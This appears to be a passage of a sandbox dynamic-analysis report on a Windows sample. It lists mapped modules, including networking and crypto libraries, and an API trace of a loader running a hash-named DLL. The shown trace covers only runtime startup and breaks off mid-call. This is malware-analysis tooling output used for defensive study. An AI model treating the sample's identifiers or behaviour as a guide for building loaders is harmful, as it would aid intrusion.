entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 624 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 625 start_va = 0x3da0000 end_va = 0x40d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 627 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 628 start_va = 0x40e0000 end_va = 0x4367fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 633 start_va = 0x40e0000 end_va = 0x422bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 635 start_va = 0x40e0000 end_va = 0x42abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 727 start_va = 0x40e0000 end_va = 0x5673fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1229 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1233 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1234 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1235 start_va = 0x40e0000 end_va = 0x42a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1239 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1240 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1241 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1242 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1243 start_va = 0x40e0000 end_va = 0x423afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1257 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 15 os_tid = 0xf30 [0080.092] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.092] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0080.092] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.093] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0080.093] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0080.093] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.093] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0080.094] GetProcessHeap () returned 0x5b0000 [0080.094] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.094] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0080.094] GetLastError () returned 0x7e [0080.094] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0080.094] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0080.095] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c8) returned 0x5bc2c0 [0080.095] SetLastError (dwErrCode=0x7e) [0080.095] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1200) returned 0x5c3410 [0080.097] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0080.097] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.097] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.097] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW" [0080.097] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW" [0080.097] GetACP () returned 0x4e4 [0080.097] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x228) returned 0x5b4ef0 [0080.097] IsValidCodePage (CodePage=0x4e4) returned 1 [0080.097] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0080.097] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0080.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0080.098] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0080.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0080.098] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0080.098] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0080.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0080.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0080.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0080.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0080.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0080.099] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0080.099] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x100) returned 0x5c2220 [0080.099] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0080.099] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x160) returned 0x5b9610 [0080.099] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0080.099] GetLastError () returned 0x0 [0080.099] SetLastError (dwErrCode=0x0) [0080.099] GetEnvironmentStringsW () returned 0x5c4620* [0080.099] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9cc) returned 0x5c5000 [0080.099] FreeEnvironmentStringsW (penv=0x5c4620) returned 1 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x118) returned 0x5ba460 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c0ad0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5c) returned 0x5b0780 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5b4770 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x78) returned 0x5bc690 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5b55b0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x28) returned 0x5bb650 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c0e40 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5bb500 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3a) returned 0x5c0940 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5b44e0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5bc710 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5b47e0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5bb860 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd2) returned 0x5b5840 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7c) returned 0x5b3fd0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3a) returned 0x5bff40 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x90) returned 0x5b3c00 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5bb6b0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5b4550 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5b5620 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c0da0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5b8fb0 [0080.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c0080 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd6) returned 0x5b5180 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5b20c0 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5bb350 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5b2100 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5b9010 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5b8b30 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5bb560 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x42) returned 0x5c0580 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5b2140 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x44) returned 0x5c0760 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5bb8f0 [0080.101] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5000 | out: hHeap=0x5b0000) returned 1 [0080.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1000) returned 0x5c4620 [0080.101] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0080.102] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0080.102] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW" [0080.102] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" 